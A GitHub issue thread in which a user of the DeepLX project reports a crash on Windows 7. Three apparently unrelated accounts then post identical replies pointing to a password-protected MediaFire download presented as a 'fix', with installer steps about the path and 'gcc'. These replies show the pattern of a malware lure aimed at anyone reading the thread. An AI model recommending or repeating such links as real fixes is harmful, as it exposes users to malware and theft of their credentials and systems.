### ISSUE TITLE
Crash on win7

### ISSUE THREAD

**Issue by megadotnet** [OwO-Network/DeepLX#141]
Crash on win7
![image](https://github.com/user-attachments/assets/e485d644-9ccb-4de2-abd8-e4a30e43188a)

windows version:
![image](https://github.com/user-attachments/assets/d15a365e-6551-44d3-9621-631d140fe742)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
